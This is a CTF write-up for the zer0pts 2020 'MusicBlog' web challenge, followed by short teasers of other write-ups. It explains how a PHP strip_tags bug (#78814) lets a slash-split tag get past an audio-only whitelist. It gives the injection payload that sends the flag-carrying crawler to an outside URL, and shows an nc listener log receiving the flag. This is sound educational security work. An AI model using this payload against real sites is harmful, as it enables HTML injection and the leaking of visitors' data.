Try   HackMD

[zer0pts CTF 2020] MusicBlog

tags: zer0pts CTF, zer0pts CTF 2020, web

Solution

We're given source codes for database, app, and crawler. The location of flag can easily be found in worker/worker.js.

























// (snipped)

const flag = 'zer0pts{<censored>}';

// (snipped)

const crawl = async (url) => {
    console.log(`[+] Query! (${url})`);
    const page = await browser.newPage();
    try {
        await page.setUserAgent(flag);
        await page.goto(url, {
            waitUntil: 'networkidle0',
            timeout: 10 * 1000,
        });
        await page.click('#like');
    } catch (err){
        console.log(err);
    }
    await page.close();
    console.log(`[+] Done! (${url})`)
};

// (snipped)

The flag is in User-Agent header. This means that you can get the flag if the crawler accesses websites you own. But how?

Hack the URL where the crawler accesses? As you can see from new_post.php, you can't.











  if ($publish) {
    try {
      $redis = new Redis();
      $redis->connect("redis", 6379);
      $redis->rPush("query", $id);
    } catch (Exception $e) {
      print($e);
      exit(0);
    }
  }

XSS? As you can see from post.php, it seems that you can't use HTML tags other than <audio>.





// post.php
          <div class="mt-3">
            <?= render_tags($post['content']) ?>
          </div>








// util.php
// [[URL]] → <audio src="URL"></audio>
function render_tags($str) {
  $str = preg_replace('/\[\[(.+?)\]\]/', '<audio controls src="\\1"></audio>', $str);
  $str = strip_tags($str, '<audio>'); // only allows `<audio>`
  return $str;
}

But you can. As you can see from Dockerfile in web, the web server uses PHP 7.4.0. The latest version of PHP is now PHP 7.4.3, so it seems a bit old. Let's read changelog of 7.4.0 → 7.4.1.

  • Standard:
    • Fixed bug #78814 (strip_tags allows / in tag name => whitelist bypass).

This app uses strip_tags for remove tags other than <audio>. Let's dig the bug.

Bug #78814 strip_tags allows / in tag name, allowing whitelist bypass in browsers

When strip_tags is used with a whitelist of tags, php allows slashes ("/") that occur inside the name of a whitelisted tag and copies them to the result.

For example, if <strong> is whitelisted, then a tag <s/trong> is also kept.

This means that in the app's case, strip_tags allows <a/udio>, which is interpreted as <a>.

So, with a payload like [["></audio><a/udio href="(URL)" id="like">test</a/udio><audio a="]], you can bring the crawler to any URL.

$ nc -lvp 8000
Listening on [0.0.0.0] (family 0, port 8000)
Connection from ec2-3-112-201-75.ap-northeast-1.compute.amazonaws.com 33926 received!
GET / HTTP/1.1
︙
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: zer0pts{M4sh1m4fr3sh!!}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
︙
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Last changed by 
st98
https://st98.github.io https://twitter.com/st98_
0
877

Read more

GuestFS:AFR - zer0pts CTF 2021

Overview This is a service that you can create, read, and delete files including symbolic links. Filename should not contain characters except for 0-9A-Za-z. When you create a symbolic link, the link target should not start with / or contain ... Solution Paths of link targets will be only checked when files are created. Looking through the source code, you will notice that the order of checking a target path is, calling symlink, then checking the target path with readlink. Why does it checks the target path after a symbolic link is created? /* Create a symbolic link */

Mar 7, 2021
Baby SQLi - zer0pts CTF 2021

Overview The flag is in templates/index.html as below. To obtain the flag, you need to be logged in as admin, or read the content of the template file. {% if name == &apos;admin&apos; %} &lt;p&gt;zer0pts{*****CENSORED*****}&lt;/p&gt; {% else %} User input will be embedded in SQL statement, however, SQL Injection in /login seems to be prevented by escaping it.

Mar 6, 2021
Kantan Calc - zer0pts CTF 2021

Overview User input and the flag will be inserted into &apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })(), and the server executes the code in sandbox. const result = vm.runInNewContext(`&apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })()`, {}, { timeout: 100 }); As you can see in the code, the flag is inserted as a comment in a function, after user input. So, what you need to do is somehow exfiltrating the comment by, for example, converting the function to String and outputting it. Since the server sets the maximum length of user input to 29 characters, you need to do code-golf with some features available in recent ECMAScript. const code = req.query.code + &apos;&apos;;

Mar 6, 2021
Simple Blog - zer0pts CTF 2021

Overview This application fetches api.php and renders the contents by JSONP. The length of the name of a callback function is up to 20 characters. &lt;?php header(&apos;Content-Type: application/javascript&apos;); $callback = $_GET[&apos;callback&apos;] ?? &apos;render&apos;; if (strlen($callback) &gt; 20) { die(&apos;throw new Error(&quot;callback name is too long&quot;)&apos;); }

Mar 6, 2021
Read more from st98
Published on HackMD